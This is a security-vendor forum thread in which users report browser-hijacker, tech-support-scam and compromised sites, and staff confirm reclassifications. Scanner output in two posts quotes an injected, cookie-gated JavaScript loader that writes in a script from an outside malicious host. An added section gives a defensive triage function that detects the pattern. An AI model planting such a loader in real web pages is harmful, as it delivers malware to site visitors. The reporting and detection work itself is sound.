Author Topic: False positives and exploits which are undetected  (Read 126776 times)


Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #108 on: December 26, 2014, 03:45:39 AM »
Thanks for your feedback, kitmub. Our analysts are working on it.

Offline sithlordadler

  • Comodo's Hero
  • *****
  • Posts: 257
Re: False positives and exploits which are undetected
« Reply #109 on: June 27, 2015, 04:05:00 PM »
(We can report bad websites here also, correct?)
https://app.webinspector.com/public/reports/36449380
Mysearchdial(.com) is a browser hijacker site.

WOT: https://www.mywot.com/en/scorecard/mysearchdial.com

The people who created it might try to convince you that it is not, but it indeed is.
A toolbar of mysearchdial is included in the startmysearchdial browser hijacker
http://malwaretips.com/blogs/start-mysearchdial-removal/
Windows 10, WOT, TOR and google, CIS 10, Malwarebytes free.

Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #110 on: June 30, 2015, 05:43:53 AM »
Thanks for your feedback, sithlordadler. I see this site has some dark history. Can you point me to binaries on this site? I can't see any. I found a Chrome add-on in the Google store, but it's a year old and still there, so I'm in doubt it's harmful.


Offline Slav

  • Comodo Member
  • **
  • Posts: 27
Re: False positives and exploits which are undetected
« Reply #112 on: July 21, 2015, 05:46:00 AM »
Thanks for the feedback, kitmub! Changes will be applied shortly.
Here is the updated report: https://app.webinspector.com/public/reports/37857749
« Last Edit: July 21, 2015, 08:17:23 AM by Slav »

Offline merabet ameur

  • Newbie
  • *
  • Posts: 1
  • merabet ameur
Re: False positives and exploits which are undetected
« Reply #113 on: December 27, 2016, 11:19:38 AM »
Good day, a specific unit treated in short practice, the affect is known on the margins of education, everything seems to turn and astonish, moreover in a verbal and [villeux] session, impressive and filled with serenity,
in the composure of finding the solution

Online EricJH

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 23877
Re: False positives and exploits which are undetected
« Reply #114 on: December 30, 2016, 11:57:40 AM »
Amer, welcome to the Comodo Forums. Could you please speak English here in the international part of the board?

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #115 on: April 02, 2017, 11:02:44 AM »
Site tries to block access to the browser and recommends users to call a suspicious FAKE service hotline .... !!! This site contains a malicious script and iframe too !!!

http://zulu.zscaler.com/submission/show/e45d157834bd6a0b199ce081020504ee-1491164312

Should be blacklisted and blocked ..... !!!

https://app.webinspector.com/public/reports/68356419?cache=true

« Last Edit: April 02, 2017, 04:28:58 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #116 on: July 20, 2017, 08:55:49 PM »
Should be blacklisted and blocked ..... !!!

h**p://batterychargers.info/image/flags/catalog >>> https://app.webinspector.com/public/reports/73993498 >>> Classified as SAFE !!! Should be classified as MALICIOUS !!!

http://zulu.zscaler.com/submission/show/1a275edb2a2beeccab23034303badbb4-1500594542

- Too low entropy detected in string : [['<span style="text-decoration: line-through;"><span class="price-old"></span></span> <span class="pri']] of length 115

- Detected encoded JavaScript code commonly used to hide malicious behaviour : [[<script type='text/javascript' language='javascript' >  <!--  function getOptionCount() {   return $("select option:selected[value!='']").length;   }   $(document).on('change', $('.option'), function() {   var totalCount = getOptionCount();



h**p://www.g-cindustries.com/
>>> https://app.webinspector.com/public/reports/73977023?cache=true >>> Classified as SUSPICIOUS !!! Should be classified as MALICIOUS !!!

http://zulu.zscaler.com/submission/show/2927a7db3b23e9f5bd63e0f6971e7a84-1500521673

- Too low entropy detected in string : [['<a href=\'%26#109;ai%26#108;%26#116;o:%26#105;nf%26#111;%26#64;g-c%26#105;nd%26#117;str%26#105;%26#101;s%26#46;c%26#111;m\'>']] of length 100

- Detected encoded JavaScript code commonly used to hide malicious behaviour : [[<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'h**p://www.bonhoeffer.pl/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'snt2014' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + ... )
« Last Edit: August 08, 2017, 08:19:14 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***

Offline JamesLawrence

  • Newbie
  • *
  • Posts: 1
Re: False positives and exploits which are undetected
« Reply #117 on: July 21, 2017, 04:42:41 AM »
Hi Pio,

Thank you for reporting. It's fixed, updated changes will be reflected shortly.

Kind Regards,
JamesLawrence

Offline pio

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 423
  • I like CIS , Kali Linux , IDA Pro & Fl Studio ;)
Re: False positives and exploits which are undetected
« Reply #118 on: August 08, 2017, 08:30:05 PM »

h**p://www.g-cindustries.com/ >>> https://app.webinspector.com/public/reports/73977023?cache=true >>> Classified as SUSPICIOUS !!! Should be classified as MALICIOUS !!!

The website uses a malicious JavaScript to contact another malicious website. Contacted website "Sucuri" check >>> https://sitecheck.sucuri.net/results/www.bonhoeffer.pl

Sucuri Website conclusion : "Domain detected on spam or phishing campaigns. This specific URL was identified in malicious campaigns to disseminate malware. Details: http://labs.sucuri.net/?blacklist=bonhoeffer.pl"

- Too low entropy detected in string : [['<a href=\'%26#109;ai%26#108;%26#116;o:%26#105;nf%26#111;%26#64;g-c%26#105;nd%26#117;str%26#105;%26#101;s%26#46;c%26#111;m\'>']] of length 100

- Detected encoded JavaScript code: [[<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")%26%26(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'h**p://www.bonhoeffer.pl/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'snt2014' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + ... )

:-La :-La :-La Still NOT fixed !!!! :-La :-La :-La 88) The CIS Web Filter doesn't block this website !!! Firefox does that ..... !!! ;) Both sites should be classified as malicious! The status "suspicious" is really outdated. :)
« Last Edit: August 08, 2017, 09:26:30 PM by pio »
*** Paranoid Bastard since CIS 3.5 ! Independent - NON Profit Malware Analyst ***
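
The cookie-gated `document.write` loader quoted in the scanner output above, turned into a static triage check, together with a decoder for the `%26#NNN;` entity strings so the flagged text can be read. This is an added example, not part of any forum post or of the Comodo, Zscaler or Sucuri tooling; the sample script and the hosts `loader.example` and `shop.example` are constructed, and the function names are hypothetical.

```javascript
// Added example: static triage of an inline <script> body.
// SAMPLE is constructed; loader.example and shop.example are placeholders.
const SAMPLE = `null==getCookie("seen")&&(setCookie("seen",1,1),document.write('<script type="text/javascript" src="' + 'h**p://loader.example/js/lib.min.php' + '?utm_source=' + window.location.host + '"></scr' + 'ipt>'));`;

// Quoted absolute URL literal, including defanged schemes (h**p, hxxp).
const URL_LITERAL = /['"](h(?:tt|\*\*|xx)ps?):\/\/([^\/'"\s]+)([^'"]*)['"]/gi;

// Decode numeric HTML entities, also when '&' arrives URL-encoded as %26.
function decodeEntities(s) {
  return s
    .replace(/%26/gi, '&')
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(Number(d)));
}

// Report document.write() calls that emit a <script src=...> and the hosts
// they point at, flagging hosts that differ from the page's own host.
function findInjectedScripts(scriptBody, pageHost) {
  const findings = [];
  const writeCall = /document\.write(?:ln)?\s*\(/g;
  let m;
  while ((m = writeCall.exec(scriptBody)) !== null) {
    // Minified code has no line breaks, so inspect a bounded window instead.
    const chunk = scriptBody.slice(m.index, m.index + 600);
    if (!/<script\b[^>]*\bsrc\s*=/i.test(chunk)) continue;
    URL_LITERAL.lastIndex = 0;
    let u;
    while ((u = URL_LITERAL.exec(chunk)) !== null) {
      const host = u[2].toLowerCase();
      findings.push({
        host,
        path: u[3],
        crossOrigin: host !== pageHost.toLowerCase(),
        // The loader appends the visited site's host to the request.
        leaksPageHost: /window\.location\.host|document\.domain/.test(chunk),
      });
    }
  }
  return findings;
}

console.log(findInjectedScripts(SAMPLE, 'shop.example'));
console.log(decodeEntities('%26#109;ai%26#108;%26#116;o:%26#105;nfo%26#64;shop.example'));
```

A hit with `crossOrigin: true` is a lead to check the reported host against reputation sources, not a verdict on its own.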

Offline amirtha

  • Newbie
  • *
  • Posts: 1
Re: False positives and exploits which are undetected
« Reply #119 on: August 09, 2017, 02:31:28 AM »
Hi Pio,

Thanks for reporting. The changes are updated. It will reflect soon.


Kind Regards,
Amirtha.

 
